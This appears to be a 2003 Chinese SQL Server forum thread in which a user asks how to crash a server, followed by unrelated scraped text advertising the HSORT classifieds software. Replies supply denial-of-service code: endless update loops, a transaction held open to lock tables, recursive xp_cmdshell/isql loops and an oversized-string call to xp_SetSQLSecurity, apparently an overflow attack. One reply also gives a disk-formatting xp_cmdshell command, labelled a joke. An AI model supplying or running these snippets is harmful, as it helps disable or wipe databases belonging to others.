如何拖垮SQL服务器????

flashroom 2003-08-22 10:17:17
use pubs
while (1=1)
begin
update jobs set job_desc='Publisher' where job_id=5
end

我想拖垮这台服务器。可是弄的我自己机器也奇慢

哪位高手给段拖垮它的代码???
...全文
69 7 打赏 收藏 转发到动态 举报
写回复
用AI写文章
7 条回复
切换为时间正序
请发表友善的回复…
发表回复
txlicenhe 2003-08-22
  • 打赏
  • 举报
回复
begin tran
update jobs set job_desc='Publisher' where job_id=5

就是不提交(commit)也不回滚(rollback)

flashroom 2003-08-22
  • 打赏
  • 举报
回复
TO zarge(鲨至)

能告诉我是什么意思吗???
flashroom 2003-08-22
  • 打赏
  • 举报
回复
TO:txlicenhe(不做技术高手)

好象这样格的是我的硬盘
flashroom 2003-08-22
  • 打赏
  • 举报
回复
to:happydreamer(小黑-潜水中)

没有这个存储过程啊
zarge 2003-08-22
  • 打赏
  • 举报
回复
while (1=1)
begin
exec master..xp_cmdshell 'isql -S servername -E -q "while (1=1) begin select * from master..sysmessages end"'
end

happydreamer 2003-08-22
  • 打赏
  • 举报
回复
你先在文本编辑器里疯狂拷贝40K-50K的文字在全选粘贴到查询分析器里写入:
exec xp_SetSQLSecurity 'aa','bb','粘贴到这','aa' 决对搞定!!
txlicenhe 2003-08-22
  • 打赏
  • 举报
回复
搞破坏呀?

master..xp_cmdshell 'format d:'

千万别当真!!!
如果您使用的免费版本,请上传上服务器后,使用install.asp 进行安装,如果安装出现问题则使用/admin/login.asp登录到后台,此时默认用户密码为hsort 1.2更新问题: 1.优化内部逻辑,增加数据承载量 2.SEO进行部分 3.2.0版本预备代码 4.修正了数据采集的部分问题,减少HTML代码造成的页面混乱问题 5.免费版本不提供广告管理和地区分类管理 6.修正了链接的问题 7.增加最新信息调用说明 8.修正了BASE功能,子目录可以访问 9.请修改自己的数据库路径,和更改自己的数据库名称,防止黑客下载 HSORT分类信息系统1.2源码 -生成html/带黄页、地图服务、服务器审核和自动采集系统 后台用户名:hsort 后台密码:hsort 后台登陆地址:admin/login.asp 类型:分类信息 演示地址:www.5fenlei.com 技术支持:http://bbs.hsort.com 开发语言:asp 数据库:Access/Mssql 安装方法:打开根目录下的install.asp文件,按照提示操作即可 升级说明: 1.完善系统核心,提高稳定性和安全性 2.完善友情链接系统,支持图片链接 3.首页最新信息显示信息地区和发布日期 4.增加系统安装功能,使系统安装更加便利 源码介绍: 一个功能强大的分类信息(广告)系统,支持自定义分类信息类别、地区和企业黄页分类功能。整个网站风格简单明了,界面美观大方,提高网络推广效果,是国内互联网上不可多得的优秀程序。后 台批量管理分类和企业信息。本系统的扩展功能强大,能方便快捷地建立一个功能强大的分类(广告)信息和黄页查询平台。 更重要的是采用了服务器垃圾信息审核和自动采集功能。 *任何发布的信息,都进行垃圾信息状态分析,严格过滤,最大限度减少站长因为关键字问题被关站的可能性,大大减少分类信息的维护量,能够专注自己站点的推广 *自动采集功能,使用分布式采集系统作为支持。不会因为传统采集而把宿主服务器拖垮,大大降低了对空间性能的需求。无限扩展采集。 1、支持分类信息类别和企业黄页类别和地区分类功能; 2、可按地区显示和查询信息,可以发展分站加盟; 3、整个网站风格简单明了,界面美观大方,提高网络推广效果; 4、企业黄页风格可以方便修改; 5、对每一个添加的信息进行审核管理; 6、对每一个加入的企业进行审核管理(生成静态页); 7、站内关键字分类查询功能; 8、本类推荐信息(显示在信息页面右侧滚动显示) 9、支持两种信息发布方式:游客快速发布和注册用户登陆后发布,后者具有可修改信息和自定义风格、字数多达1500等强大功能; 10、后台管理功能强大:分类信息/类别管理/会员管理/留言管理/企业管理/推荐企业/企业地区/修改密码; 11、后台可查看发布信息的来源IP和身份证地区查询; 12、发布信息时身份证号码验证,可有效避免无效信息; 13、互动性强:游客可以自由对信息发表留言,与发布者互动; 14、支持图片上传并可在页面中显示,增强广告效果; 15、全站SQL防注入功能和数据库防下载功能,防止图片木马注入 16、系统安全管理(自动封注入者Ip功能,使注入者不能再访问本站) 17、最新中文验证码系统,大大防止了垃圾信息的产生 18、发信息时的验证码验证功能 19、系统基本设置管理增加了--过滤非法词语(过滤为*) 20、系统基本设置管理增加了--垃圾信息黑名单(联系电话) 21、分类信息生成html,提高搜索引擎录入率,减轻服务器负担,加快页面打开速度。 22、优化美化了分类信息最终页面,并可以随意编辑 23、增加了后台系统安全管理中搜索IP的功能 24、增加了小类信息、最新信息、小类推荐信息的js调用 25、管理上传文件功能,清除用户上传的多余垃圾图片 26、全部支持地图标注,高级版本支持地图搜索 27、可根据客户需要增加地图频道 28、SQL版本支持地图区域搜索 29、高级版本根据客户要求模板一套 30、支持多主页,随意调整,支持首页自动生成HTML页面

34,590

社区成员

发帖
与我相关
我的任务
社区描述
MS-SQL Server相关内容讨论专区
社区管理员
  • 基础类社区
  • 二月十六
  • 卖水果的net
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧